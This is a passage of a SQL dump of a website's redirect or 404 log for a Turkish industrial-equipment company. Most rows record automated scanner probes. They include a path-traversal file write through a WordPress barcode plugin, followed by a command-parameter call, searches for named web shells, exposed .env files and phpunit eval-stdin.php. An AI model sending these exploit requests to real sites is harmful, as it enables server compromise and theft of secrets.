00:00:00',301),(31915,'http://www.3s-technologies.com.tr/en/wp-content/plugins/wpcargo/includes/barcode.php?text=x1x1111x1xx1xx111xx11111xx1x111x1x1x1xxx11x1111xx1x11xxxx1xx1xxxxx1x1x1xx1x1x11xx1xxxx1x11xx111xxx1xx1xx1x1x1xxx11x1111xxx1xxx1xx1x111xxx1x1xx1xxx1x1x1xx1x1x11xxx11xx1x11xx111xx1xxx1xx11x1x11x11x1111x1x11111x1x1xxxx&sizefactor=.090909090909&size=1&filepath=../../../x.php',NULL,'www.google.com','',1,0,'2023-01-24 11:32:52','0000-00-00 00:00:00',301),(31916,'http://www.3s-technologies.com.tr//wp-content/x.php?1=system',NULL,'www.google.com','',1,0,'2023-01-24 11:32:53','0000-00-00 00:00:00',301),(31917,'http://www.3s-technologies.com.tr/en/wp-content/king.php',NULL,'www.google.com','',1,0,'2023-01-24 11:32:54','0000-00-00 00:00:00',301),(31918,'http://www.3s-technologies.com.tr/en/wp-content/plugins/wp-file-manager-pro/lib/php/connector.minimal.php',NULL,'www.google.com','',1,0,'2023-01-24 11:32:56','0000-00-00 00:00:00',301),(31919,'http://www.3s-technologies.com.tr//wp-content/plugins/gatewayapi/inc/css_js.php',NULL,'www.google.com','',1,0,'2023-01-24 11:32:57','0000-00-00 00:00:00',301),(31920,'http://www.3s-technologies.com.tr/en/wp-content/plugins/gatewayapi/inc/a57bze8931.php',NULL,'www.google.com','',2,0,'2023-01-24 11:32:58','0000-00-00 00:00:00',301),(31921,'http://www.3s-technologies.com.tr//wp-content/plugins/divi-contact-extended/includes/upload.php',NULL,'www.google.com','',1,0,'2023-01-24 11:32:59','0000-00-00 00:00:00',301),(31922,'https://3s-technologies.com.tr/tr/2006/license.txt',NULL,'https://3s-technologies.com.tr/2006/license.txt','',1,0,'2023-01-24 13:41:44','0000-00-00 00:00:00',301),(31923,'https://3s-technologies.com.tr/tr/2007/license.txt',NULL,'https://3s-technologies.com.tr/2007/license.txt','',1,0,'2023-01-24 18:20:40','0000-00-00 00:00:00',301),(31924,'https://3s-technologies.com.tr/tr/3/license.txt',NULL,'https://3s-technologies.com.tr/3/license.txt','',1,0,'2023-01-24 23:00:47','0000-00-00 00:00:00',301),(31925,'https://3s-technologies.com.tr/tr/@/license.txt',NULL,'https://3s-technologies.com.tr/@/license.txt','',1,0,'2023-01-25 12:45:29','0000-00-00 00:00:00',301),(31926,'http://3s-technologies.com.tr/en/license.txt',NULL,'','',1,0,'2023-01-25 19:31:10','0000-00-00 00:00:00',301),(31927,'http://3s-technologies.com.tr/tr/wp-content/plugins/formidable/pro/js/ofc-library/ofc_upload_image.php',NULL,'','',3,0,'2023-01-26 05:09:43','0000-00-00 00:00:00',301),(31928,'http://3s-technologies.com.tr/tr/wp-cc.php',NULL,'','',9,0,'2023-01-26 07:17:46','0000-00-00 00:00:00',301),(31929,'https://3s-technologies.com.tr/tr/admin/license.txt',NULL,'https://3s-technologies.com.tr/Admin/license.txt','',1,0,'2023-01-26 07:52:10','0000-00-00 00:00:00',301),(31930,'https://3s-technologies.com.tr/tr/administration/license.txt',NULL,'https://3s-technologies.com.tr/Administration/license.txt','',1,0,'2023-01-26 12:58:54','0000-00-00 00:00:00',301),(31931,'https://3s-technologies.com.tr/tr/archive/license.txt',NULL,'https://3s-technologies.com.tr/Archive/license.txt','',1,0,'2023-01-26 18:05:53','0000-00-00 00:00:00',301),(31932,'https://3s-technologies.com.tr/en/wordpress/xmlrpc.php',NULL,'','',3,0,'2023-01-26 20:52:11','0000-00-00 00:00:00',301),(31933,'https://3s-technologies.com.tr/en/wp/xmlrpc.php',NULL,'','',11,0,'2023-01-26 20:52:12','0000-00-00 00:00:00',301),(31934,'https://3s-technologies.com.tr/en/admin/',NULL,'','',1,0,'2023-01-26 20:52:16','0000-00-00 00:00:00',301),(31935,'https://3s-technologies.com.tr/en/login',NULL,'','',352,0,'2023-01-26 20:52:17','0000-00-00 00:00:00',301),(31936,'http://3s-technologies.com.tr/tr/wp-content/plugins/dos2unix/dos2unix.php',NULL,'','',1,0,'2023-01-27 03:24:06','0000-00-00 00:00:00',301),(31937,'http://3s-technologies.com.tr/tr/wp-content/plugins/ip-logger/chart/ofc_upload_image.php',NULL,'','',3,0,'2023-01-27 12:20:24','0000-00-00 00:00:00',301),(31938,'https://3s-technologies.com.tr/tr/wp-reset.php',NULL,'https://3s-technologies.com.tr/wp-reset.php','',1,0,'2023-01-28 01:57:20','0000-00-00 00:00:00',301),(31939,'https://3s-technologies.com.tr/tr/wp-setups.php',NULL,'https://3s-technologies.com.tr/wp-setups.php','',1,0,'2023-01-28 01:57:21','0000-00-00 00:00:00',301),(31940,'https://3s-technologies.com.tr/tr/about.php?673435=1',NULL,'https://3s-technologies.com.tr/about.php?673435=1','',1,0,'2023-01-28 01:57:23','0000-00-00 00:00:00',301),(31941,'https://3s-technologies.com.tr/admin.php',NULL,'','',1,0,'2023-01-28 01:57:25','0000-00-00 00:00:00',301),(31942,'https://3s-technologies.com.tr/tr/wp-story.php?673435=1',NULL,'https://3s-technologies.com.tr/wp-story.php?673435=1','',1,0,'2023-01-28 01:57:26','0000-00-00 00:00:00',301),(31943,'https://3s-technologies.com.tr/wp-story.php',NULL,'','',1,0,'2023-01-28 01:57:27','0000-00-00 00:00:00',301),(31944,'https://3s-technologies.com.tr/tr/123.php?1=dmfyx2r1bxaoijg1njq1dzqikts=',NULL,'https://3s-technologies.com.tr/123.php?1=dmFyX2R1bXAoIjg1NjQ1dzQiKTs=','',1,0,'2023-01-28 01:57:28','0000-00-00 00:00:00',301),(31945,'https://3s-technologies.com.tr/tr/nf_tracking.php',NULL,'https://3s-technologies.com.tr/nf_tracking.php','',1,0,'2023-01-28 01:57:29','0000-00-00 00:00:00',301),(31946,'http://www.3s-technologies.com.tr/en/ah%c5%9fap-i%c5%9fleme-wood-processing-120cm',NULL,'http://www.google.com','',1,0,'2023-01-28 02:44:36','0000-00-00 00:00:00',301),(31947,'https://www.3s-technologies.com.tr/tr/ah%c5%9fap-i%c5%9fleme-wood-processing-120cm',NULL,'http://www.google.com','',2,0,'2023-01-28 02:44:36','0000-00-00 00:00:00',301),(31948,'https://www.3s-technologies.com.tr/tr/%c3%bcr%c3%bcnler/b%c3%b6lgesel-lehimleme',NULL,'http://www.google.com','',2,0,'2023-01-28 02:45:01','0000-00-00 00:00:00',301),(31949,'https://www.3s-technologies.com.tr/tr/%c3%bcr%c3%bcnler/cnc',NULL,'http://www.google.com','',2,0,'2023-01-28 02:45:02','0000-00-00 00:00:00',301),(31950,'https://www.3s-technologies.com.tr/tr/%c3%bcr%c3%bcnler/screen-printer',NULL,'http://www.google.com','',2,0,'2023-01-28 02:45:03','0000-00-00 00:00:00',301),(31951,'https://www.3s-technologies.com.tr/tr/%c3%bcr%c3%bcnler/dalga-lehim',NULL,'http://www.google.com','',2,0,'2023-01-28 02:45:04','0000-00-00 00:00:00',301),(31952,'https://www.3s-technologies.com.tr/tr/%c3%bcr%c3%bcnler/smd-d%c3%bc%c5%9f%c3%bck-h%c4%b1zl%c4%b1',NULL,'http://www.google.com','',2,0,'2023-01-28 02:45:04','0000-00-00 00:00:00',301),(31953,'https://www.3s-technologies.com.tr/tr/%c3%bcr%c3%bcnler',NULL,'http://www.google.com','',2,0,'2023-01-28 02:45:07','0000-00-00 00:00:00',301),(31954,'https://3s-technologies.com.tr/tr/%c3%bcr%c3%bcnler/konveyorler',NULL,'http://www.google.com','',1,0,'2023-01-28 02:45:08','0000-00-00 00:00:00',301),(31955,'https://www.3s-technologies.com.tr/tr/hakk%c4%b1m%c4%b1zda',NULL,'http://www.google.com','',2,0,'2023-01-28 02:45:08','0000-00-00 00:00:00',301),(31956,'https://3s-technologies.com.tr/tr/ãƒâ¼rãƒâ¼nler/screen-printer',NULL,'','',1,0,'2023-01-28 17:05:24','0000-00-00 00:00:00',301),(31957,'http://3s-technologies.com.tr/tr/wp-content/plugins/spamtask/chart/php-ofc-library/ofc_upload_image.php',NULL,'','',2,0,'2023-01-29 00:06:52','0000-00-00 00:00:00',301),(31958,'http://3s-technologies.com.tr/en/wood-processing-ah?ap-i?leme',NULL,'','',2,0,'2023-01-30 04:02:47','0000-00-00 00:00:00',301),(31959,'http://3s-technologies.com.tr/en/akrilik-i?leme-acrylic-processing',NULL,'','',5,0,'2023-01-30 04:02:49','0000-00-00 00:00:00',301),(31960,'http://3s-technologies.com.tr/en/aluminyum-i?leme-aluminum-processing',NULL,'','',6,0,'2023-01-30 04:02:51','0000-00-00 00:00:00',301),(31961,'http://3s-technologies.com.tr/en/ah?ap-i?leme-wood-processing-120cm',NULL,'','',2,0,'2023-01-30 04:02:54','0000-00-00 00:00:00',301),(31962,'https://3s-technologies.com.tr/tr/akrilik-iãƒæ’ã¢â‚¬â¦ãƒâ€¦ã‚â¸leme-acrylic-processing',NULL,'','',1,0,'2023-01-30 20:05:35','0000-00-00 00:00:00',301),(31963,'https://3s-technologies.com.tr/tr/ãƒæ’ã†â€™ãƒâ€šã‚â¼rãƒæ’ã†â€™ãƒâ€šã‚â¼nler/cnc',NULL,'','',1,0,'2023-02-01 18:11:48','0000-00-00 00:00:00',301),(31964,'https://www.3s-technologies.com.tr/en/79-english-uk/88-eko-cnc-en',NULL,'','',5,0,'2023-02-02 18:54:29','0000-00-00 00:00:00',301),(31965,'http://3s-technologies.com.tr/tr/sites/all/modules/plupload/plupload/examples/upload.php',NULL,'','',1,0,'2023-02-02 22:50:34','0000-00-00 00:00:00',301),(31966,'https://www.3s-technologies.com.tr/en/home-en/79-english-uk/88-eko-cnc-en',NULL,'','',4,0,'2023-02-03 01:10:25','0000-00-00 00:00:00',301),(31967,'https://www.3s-technologies.com.tr/tr/github.com/joomla',NULL,'','',5,0,'2023-02-05 06:48:32','0000-00-00 00:00:00',301),(31968,'https://www.3s-technologies.com.tr/tr/?itemid=243',NULL,'','',5,0,'2023-02-05 06:48:32','0000-00-00 00:00:00',301),(31969,'https://www.3s-technologies.com.tr/tr/welcome.html',NULL,'','',8,0,'2023-02-05 06:51:35','0000-00-00 00:00:00',301),(31970,'http://3s-technologies.com.tr/en/wso112233.php',NULL,'www.google.com','',14,0,'2023-02-05 13:10:43','0000-00-00 00:00:00',301),(31971,'https://3s-technologies.com.tr/en/wp-content/wso112233.php',NULL,'www.google.com','',3,0,'2023-02-05 13:10:59','0000-00-00 00:00:00',301),(31972,'http://3s-technologies.com.tr/en/bala.php',NULL,'www.google.com','',8,0,'2023-02-05 13:11:19','0000-00-00 00:00:00',301),(31973,'https://3s-technologies.com.tr/en/wp-content/plugins/sid/sidwso.php',NULL,'www.google.com','',2,0,'2023-02-05 13:11:31','0000-00-00 00:00:00',301),(31974,'https://3s-technologies.com.tr/en/wp-content/shell20211028.php',NULL,'www.google.com','',2,0,'2023-02-05 13:11:46','0000-00-00 00:00:00',301),(31975,'https://3s-technologies.com.tr/en/wp-admin/xleet-shell.php',NULL,'www.google.com','',1,0,'2023-02-05 13:12:35','0000-00-00 00:00:00',301),(31976,'http://www.3s-technologies.com.tr/tr/iis-85.png',NULL,'http://www.3s-technologies.com.tr/iis-85.png','',2,0,'2023-02-05 16:20:43','0000-00-00 00:00:00',301),(31977,'http://3s-technologies.com.tr/tr/sitemap.ashx',NULL,'','',1,0,'2023-02-07 07:18:58','0000-00-00 00:00:00',301),(31978,'https://3s-technologies.com.tr/tr/sitemap.ashx',NULL,'','',1,0,'2023-02-07 07:19:01','0000-00-00 00:00:00',301),(31979,'http://3s-technologies.com.tr/tr/sitemap_index.xml.gz',NULL,'','',1,0,'2023-02-07 07:19:22','0000-00-00 00:00:00',301),(31980,'https://3s-technologies.com.tr/tr/sitemap_index.xml.gz',NULL,'','',3,0,'2023-02-07 07:19:26','0000-00-00 00:00:00',301),(31981,'http://3s-technologies.com.tr/en/.remote',NULL,'https://www.google.com/','',8,0,'2023-02-08 10:40:37','0000-00-00 00:00:00',301),(31982,'http://3s-technologies.com.tr/en/.local',NULL,'https://www.google.com/','',8,0,'2023-02-08 10:40:38','0000-00-00 00:00:00',301),(31983,'http://3s-technologies.com.tr/en/.production',NULL,'https://www.google.com/','',8,0,'2023-02-08 10:40:38','0000-00-00 00:00:00',301),(31984,'http://3s-technologies.com.tr/en/lib/.env',NULL,'https://www.google.com/','',8,0,'2023-02-08 10:40:39','0000-00-00 00:00:00',301),(31985,'http://3s-technologies.com.tr/en/lab/.env',NULL,'https://www.google.com/','',8,0,'2023-02-08 10:40:39','0000-00-00 00:00:00',301),(31986,'http://3s-technologies.com.tr/en/cronlab/.env',NULL,'https://www.google.com/','',8,0,'2023-02-08 10:40:40','0000-00-00 00:00:00',301),(31987,'http://3s-technologies.com.tr/en/cron/.env',NULL,'https://www.google.com/','',8,0,'2023-02-08 10:40:40','0000-00-00 00:00:00',301),(31988,'http://3s-technologies.com.tr/en/core/.env',NULL,'https://www.google.com/','',9,0,'2023-02-08 10:40:41','0000-00-00 00:00:00',301),(31989,'http://3s-technologies.com.tr/en/core/app/.env',NULL,'https://www.google.com/','',8,0,'2023-02-08 10:40:41','0000-00-00 00:00:00',301),(31990,'http://3s-technologies.com.tr/en/core/datavase/.env',NULL,'https://www.google.com/','',8,0,'2023-02-08 10:40:42','0000-00-00 00:00:00',301),(31991,'http://3s-technologies.com.tr/en/database/.env',NULL,'https://www.google.com/','',9,0,'2023-02-08 10:40:42','0000-00-00 00:00:00',301),(31992,'http://3s-technologies.com.tr/en/config/.env',NULL,'https://www.google.com/','',11,0,'2023-02-08 10:40:43','0000-00-00 00:00:00',301),(31993,'http://3s-technologies.com.tr/en/assets/.env',NULL,'https://www.google.com/','',8,0,'2023-02-08 10:40:43','0000-00-00 00:00:00',301),(31994,'http://3s-technologies.com.tr/en/app/.env',NULL,'https://www.google.com/','',10,0,'2023-02-08 10:40:44','0000-00-00 00:00:00',301),(31995,'http://3s-technologies.com.tr/en/apps/.env',NULL,'https://www.google.com/','',8,0,'2023-02-08 10:40:45','0000-00-00 00:00:00',301),(31996,'http://3s-technologies.com.tr/en/uploads/.env',NULL,'https://www.google.com/','',8,0,'2023-02-08 10:40:45','0000-00-00 00:00:00',301),(31997,'http://3s-technologies.com.tr/en/sitemaps/.env',NULL,'https://www.google.com/','',8,0,'2023-02-08 10:40:46','0000-00-00 00:00:00',301),(31998,'http://3s-technologies.com.tr/en/saas/.env',NULL,'https://www.google.com/','',8,0,'2023-02-08 10:40:46','0000-00-00 00:00:00',301),(31999,'http://3s-technologies.com.tr/en/psnlink/.env',NULL,'https://www.google.com/','',8,0,'2023-02-08 10:40:48','0000-00-00 00:00:00',301),(32000,'http://3s-technologies.com.tr/en/exapi/.env',NULL,'https://www.google.com/','',8,0,'2023-02-08 10:40:48','0000-00-00 00:00:00',301),(32001,'http://3s-technologies.com.tr/en/site/.env',NULL,'https://www.google.com/','',9,0,'2023-02-08 10:40:49','0000-00-00 00:00:00',301),(32002,'http://3s-technologies.com.tr/en/web/.env',NULL,'https://www.google.com/','',9,0,'2023-02-08 10:40:50','0000-00-00 00:00:00',301),(32003,'http://3s-technologies.com.tr//en/.env',NULL,'https://www.google.com/','',7,0,'2023-02-08 10:40:50','0000-00-00 00:00:00',301),(32004,'http://3s-technologies.com.tr/en/tools/.env',NULL,'https://www.google.com/','',8,0,'2023-02-08 10:40:51','0000-00-00 00:00:00',301),(32005,'http://3s-technologies.com.tr/en/v1/.env',NULL,'https://www.google.com/','',8,0,'2023-02-08 10:40:51','0000-00-00 00:00:00',301),(32006,'http://3s-technologies.com.tr/en/v2/.env',NULL,'https://www.google.com/','',8,0,'2023-02-08 10:40:52','0000-00-00 00:00:00',301),(32007,'http://3s-technologies.com.tr/en/administrator/.env',NULL,'https://www.google.com/','',8,0,'2023-02-08 10:40:52','0000-00-00 00:00:00',301),(32008,'http://3s-technologies.com.tr//admin/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'https://www.google.com/','',6,0,'2023-02-08 10:40:55','0000-00-00 00:00:00',301),(32009,'http://3s-technologies.com.tr//api/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'https://www.google.com/','',6,0,'2023-02-08 10:40:55','0000-00-00 00:00:00',301),(32010,'http://3s-technologies.com.tr//backup/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'https://www.google.com/','',6,0,'2023-02-08 10:40:56','0000-00-00 00:00:00',301),(32011,'http://3s-technologies.com.tr//blog/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'https://www.google.com/','',6,0,'2023-02-08 10:40:56','0000-00-00 00:00:00',301),(32012,'http://3s-technologies.com.tr//cms/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'https://www.google.com/','',6,0,'2023-02-08 10:40:56','0000-00-00 00:00:00',301),(32013,'http://3s-technologies.com.tr//demo/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'https://www.google.com/','',6,0,'2023-02-08 10:40:56','0000-00-00 00:00:00',301),(32014,'http://3s-technologies.com.tr//dev/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'https://www.google.com/','',6,0,'2023-02-08 10:40:57','0000-00-00 00:00:00',301),(32015,'http://3s-technologies.com.tr//laravel/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'https://www.google.com/','',6,0,'2023-02-08 10:40:57','0000-00-00 00:00:00',301),(32016,'http://3s-technologies.com.tr//lib/phpunit/util/php/eval-stdin.php',NULL,'https://www.google.com/','',6,0,'2023-02-08 10:40:57','0000-00-00 00:00:00',301),(32017,'http://3s-technologies.com.tr//lib/phpunit/phpunit/util/php/eval-stdin.php',NULL,'https://www.google.com/','',6,0,'2023-02-08 10:40:57','0000-00-00 00:00:00',301),(32018,'http://3s-technologies.com.tr//lib/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'https://www.google.com/','',6,0,'2023-02-08 10:40:58','0000-00-00 00:00:00',301),(32019,'http://3s-technologies.com.tr//lib/phpunit/src/util/php/eval-stdin.php',NULL,'https://www.google.com/','',6,0,'2023-02-08 10:40:58','0000-00-00 00:00:00',301),(32020,'http://3s-technologies.com.tr//new/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'https://www.google.com/','',6,0,'2023-02-08 10:40:58','0000-00-00 00:00:00',301),(32021,'http://3s-technologies.com.tr//old/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'https://www.google.com/','',6,0,'2023-02-08 10:40:58','0000-00-00 00:00:00',301),(32022,'http://3s-technologies.com.tr//panel/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'https://www.google.com/','',6,0,'2023-02-08 10:40:59','0000-00-00 00:00:00',301),(32023,'http://3s-technologies.com.tr//phpunit/util/php/eval-stdin.php',NULL,'https://www.google.com/','',6,0,'2023-02-08 10:40:59','0000-00-00 00:00:00',301),(32024,'http://3s-technologies.com.tr//phpunit/phpunit/util/php/eval-stdin.php',NULL,'https://www.google.com/','',6,0,'2023-02-08 10:40:59','0000-00-00 00:00:00',301),(32025,'http://3s-technologies.com.tr//phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'https://www.google.com/','',6,0,'2023-02-08 10:40:59','0000-00-00 00:00:00',301),(32026,'http://3s-technologies.com.tr//phpunit/src/util/php/eval-stdin.php',NULL,'https://www.google.com/','',6,0,'2023-02-08 10:40:59','0000-00-00 00:00:00',301),(32027,'http://3s-technologies.com.tr//protected/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'https://www.google.com/','',6,0,'2023-02-08 10:41:00','0000-00-00 00:00:00',301),(32028,'http://3s-technologies.com.tr//sites/all/libraries/mailchimp/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'https://www.google.com/','',6,0,'2023-02-08 10:41:00','0000-00-00 00:00:00',301),(32029,'http://3s-technologies.com.tr//vendor/phpunit/util/php/eval-stdin.php',NULL,'https://www.google.com/','',6,0,'2023-02-08 10:41:00','0000-00-00 00:00:00',301),(32030,'http://3s-technologies.com.tr//vendor/phpunit/phpunit/util/php/eval-stdin.php',NULL,'https://www.google.com/','',6,0,'2023-02-08 10:41:00','0000-00-00 00:00:00',301),(32031,'http://3s-technologies.com.tr//vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'https://www.google.com/','',6,0,'2023-02-08 10:41:01','0000-00-00 00:00:00',301),(32032,'http://3s-technologies.com.tr//vendor/phpunit/src/util/php/eval-stdin.php',NULL,'https://www.google.com/','',6,0,'2023-02-08 10:41:01','0000-00-00 00:00:00',301),(32033,'http://3s-technologies.com.tr//wp-content/plugins/cloudflare/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'https://www.google.com/','',6,0,'2023-02-08 10:41:01','0000-00-00 00:00:00',301),(32034,'http://3s-technologies.com.tr//wp-content/plugins/dzs-videogallery/class_parts/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'https://www.google.com/','',6,0,'2023-02-08 10:41:01','0000-00-00 00:00:00',301),(32035,'http://3s-technologies.com.tr//wp-content/plugins/jekyll-exporter/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'https://www.google.com/','',6,0,'2023-02-08 10:41:02','0000-00-00 00:00:00',301),(32036,'http://3s-technologies.com.tr//wp-content/plugins/mm-plugin/inc/vendors/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'https://www.google.com/','',6,0,'2023-02-08 10:41:02','0000-00-00 00:00:00',301),(32037,'http://3s-technologies.com.tr//www/vendor/phpunit/phpunit/src/util/php/eval-stdin.php',NULL,'https://www.google.com/','',6,0,'2023-02-08 10:41:02','0000-00-00 00:00:00',301),(32038,'https://3s-technologies.com.tr/tr/public/home/js/check.js',NULL,'https://3s-technologies.com.tr/Public/home/js/check.js','',37,0,'2023-02-08 12:19:54','0000-00-00 00:00:00',301),(32039,'https://mail.3s-technologies.com.tr/tr/public/home/js/check.js',NULL,'https://mail.3s-technologies.com.tr/Public/home/js/check.js','',2,0,'2023-02-08 12:19:54','0000-00-00 00:00:00',301),(32040,'https://www.3s-technologies.com.tr/tr/static/admin/javascript/hetong.js',NULL,'https://www.3s-technologies.com.tr/static/admin/javascript/hetong.js','',22,0,'2023-02-08 12:19:55','0000-00-00 00:00:00',301),(32041,'https://3s-technologies.com.tr/tr/static/admin/javascript/hetong.js',NULL,'https://3s-technologies.com.tr/static/admin/javascript/hetong.js','',35,0,'2023-02-08 12:19:56','0000-00-00 00:00:00',301),(32042,'https://mail.3s-technologies.com.tr/tr/static/admin/javascript/hetong.js',NULL,'https://mail.3s-technologies.com.tr/static/admin/javascript/hetong.js','',2,0,'2023-02-08 12:19:56','0000-00-00 00:00:00',301),(32043,'http://3s-technologies.com.tr/tr/extplorer',NULL,'','',2,0,'2023-02-08 17:55:56','0000-00-00 00:00:00',301),(32044,'http://3s-technologies.com.tr/tr/extplorer2113',NULL,'','',1,0,'2023-02-08 17:55:58','0000-00-00 00:00:00',301),(32045,'http://3s-technologies.com.tr/tr/explorer',NULL,'','',1,0,'2023-02-08 17:55:59','0000-00-00 00:00:00',301),(32046,'http://www.3s-technologies.com.tr/en/modules/mod_ariimageslidersa/mod_ariimageslidersa.php',NULL,'','',1,0,'2023-02-09 01:10:03','0000-00-00 00:00:00',301),(32047,'http://www.3s-technologies.com.tr/en/modules/mod_araticlws/mod_araticlws.php',NULL,'','',1,0,'2023-02-09 01:10:04','0000-00-00 00:00:00',301),(32048,'https://3s-technologies.com.tr/en/wp/wp-login.php',NULL,'','',16,0,'2023-02-09 08:47:14','0000-00-00 00:00:00',301),(32049,'https://3s-technologies.com.tr/tr/images/stories/virtuemart/product/npm-d3a_cn_20_0803.pdf',NULL,'','',1,0,'2023-02-11 09:07:03','0000-00-00 00:00:00',301),(32050,'https://3s-technologies.com.tr/?option=com_jdownloads&itemid=0&view=upload',NULL,'','',1,0,'2023-02-13 13:33:16','0000-00-00 00:00:00',301),(32051,'https://www.3s-technologies.com.tr/tr/public/home/js/check.js',NULL,'https://www.3s-technologies.com.tr/Public/home/js/check.js','',26,0,'2023-02-17 23:37:30','0000-00-00 00:00:00',301),(32052,'https://3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/users-component/index.php/en/using-joomla/extensions/components/users-component/registration-form',NULL,'https://3s-technologies.com.tr/index.php/en/using-joomla/extensions/components/users-component/index.php/en/using-joomla/extensions/components/users-component/registration-form','',1,0,'2023-02-21 17:36:51','0000-00-00 00:00:00',301),(32053,'http://3s-technologies.com.tr/tr/api/index.php/v1/config/application?public=true',NULL,'','',56,0,'2023-02-23 00:54:54','0000-00-00 00:00:00',301),(32054,'http://3s-technologies.com.tr/tr/joomla/api/index.php/v1/config/application?public=true',NULL,'','',4,0,'2023-02-23 00:54:55','0000-00-00 00:00:00',301),(32055,'https://www.3s-technologies.com.tr/tr/wp-content/plugins/core-stab/index.php',NULL,'','',2,0,'2023-02-24 07:36:33','0000-00-00 00:00:00',301),(32056,'https://www.3s-technologies.com.tr/tr/wp-content/rxrbrcza.php',NULL,'','',1,0,'2023-02-24 07:36:47','0000-00-00 00:00:00',301),(32057,'http://3s-technologies.com.tr/en/api/index.php/v1/config/application?public=true',NULL,'','',2,0,'2023-02-25 02:45:05','0000-00-00 00:00:00',301),(32058,'http://www.proneo-led.com/3s-technologies.com.tr/joomla/en/using-joomla/extensions/templates/atomic/home-page-atomic/81-english-uk/english-content/80-panasonic-am100-kampanya',NULL,'','',1,0,'2023-02-27 05:41:20','0000-00-00 00:00:00',301),(32059,'http://3s-technologies.com.tr/tr//wordpress/wp-admin/setup-config.php?step=1',NULL,'','',2,0,'2023-02-28 12:57:07','0000-00-00 00:00:00',301),(32060,'https://www.3s-technologies.com.tr/tr/wp-content/rxrfkbsi.php',NULL,'','',1,0,'2023-03-01 04:30:01','0000-00-00 00:00:00',301),(32061,'http://3s-technologies.com.tr/tr/database.php',NULL,'','',48,0,'2023-03-02 07:02:16','0000-00-00 00:00:00',301),(32062,'http://www.3s-technologies.com.tr/tr/wp-content/plugins/core-engine/index.php',NULL,'','',2,0,'2023-03-03 11:29:27','0000-00-00 00:00:00',301),(32063,'http://3s-technologies.com.tr/tr/wp-content/themes/classic/inc/index.php',NULL,'','',9,0,'2023-03-03 20:18:35','0000-00-00 00:00:00',301),(32064,'http://3s-technologies.com.tr/tr/wp-content/themes/classic/inc/team1877-yqyku.php',NULL,'','',1,0,'2023-03-03 20:18:36','0000-00-00 00:00:00',301),(32065,'http://3s-technologies.com.tr/tr/wp-content/themes/classic/inc/team1877-rnfsk.php',NULL,'','',1,0,'2023-03-03 20:18:39','0000-00-00 00:00:00',301),(32066,'http://3s-technologies.com.tr/tr/wp-content/plugins/core-stab/team1877-qmaow.php',NULL,'','',1,0,'2023-03-03 20:18:46','0000-00-00 00:00:00',301),(32067,'http://3s-technologies.com.tr/tr/wp-content/plugins/core-stab/team1877-aqfrt.php',NULL,'','',1,0,'2023-03-03 20:18:51','0000-00-00 00:00:00',301),(32068,'http://3s-technologies.com.tr/tr/wp-content/plugins/core-stab/team1877-fkhou.php',NULL,'','',1,0,'2023-03-03 20:18:53','0000-00-00 00:00:00',301),(32069,'http://3s-technologies.com.tr/en/wp-content/updates.php',NULL,'www.google.com','',7,0,'2023-03-04 13:50:10','0000-00-00 00:00:00',301),(32070,'http://3s-technologies.com.tr/tr/admin/jquery_uploader/server/php/index.php?file=tf2rghf.jpg',NULL,'','',3,0,'2023-03-06 09:43:24','0000-00-00 00:00:00',301),(32071,'http://3s-technologies.com.tr/tr/assets/admin/global/plugins/jquery-file-upload/server/php/index.php?file=tf2rghf.jpg',NULL,'','',1,0,'2023-03-07 16:11:27','0000-00-00 00:00:00',301),(32072,'https://www.3s-technologies.com.tr/tr/templates/beez5/images/icon_external_link.gif',NULL,'https://www.3s-technologies.com.tr/tr/','',2,0,'2023-03-08 19:57:30','0000-00-00 00:00:00',301),(32073,'https://www.3s-technologies.com.tr/tr/images/arrow1.gif',NULL,'https://www.3s-technologies.com.tr/tr/','',2,0,'2023-03-08 19:57:33','0000-00-00 00:00:00',301),(32074,'https://www.3s-technologies.com.tr/tr/images/karo.gif',NULL,'https://www.3s-technologies.com.tr/tr/','',2,0,'2023-03-08 19:57:33','0000-00-00 00:00:00',301),(32075,'https://www.3s-technologies.com.tr/tr/images/tabs_back.png',NULL,'https://www.3s-technologies.com.tr/tr/','',1,0,'2023-03-08 19:57:33','0000-00-00 00:00:00',301),(32076,'https://www.3s-technologies.com.tr/tr/images/box1.png',NULL,'https://www.3s-technologies.com.tr/tr/','',1,0,'2023-03-08 19:57:33','0000-00-00 00:00:00',301),(32077,'https://www.3s-technologies.com.tr/tr/images/header_outer.jpg',NULL,'https://www.3s-technologies.com.tr/tr/','',2,0,'2023-03-08 19:57:33','0000-00-00 00:00:00',301),(32078,'https://3s-technologies.com.tr/en/.well-known/security.txt',NULL,'https://3s-technologies.com.tr/.well-known/security.txt','',26,0,'2023-03-09 03:42:35','0000-00-00 00:00:00',301),(32079,'https://3s-technologies.com.tr/en/security.txt',NULL,'https://3s-technologies.com.tr/security.txt','',25,0,'2023-03-09 03:42:36','0000-00-00 00:00:00',301),(32080,'https://3s-technologies.com.tr/tr/images/stories/virtuemart/product/npm-d3a_en_20_0803.pdf',NULL,'','',2,0,'2023-03-09 22:22:11','0000-00-00 00:00:00',301),(32081,'http://3s-technologies.com.tr/tr/blueimp/server/php/index.php?file=tf2rghf.jpg',NULL,'','',2,0,'2023-03-10 14:37:44','0000-00-00 00:00:00',301),(32082,'https://www.3s-technologies.com.tr/tr/apple-touch-icon-120x120-precomposed.png',NULL,'','',2,0,'2023-03-10 16:04:10','0000-00-00 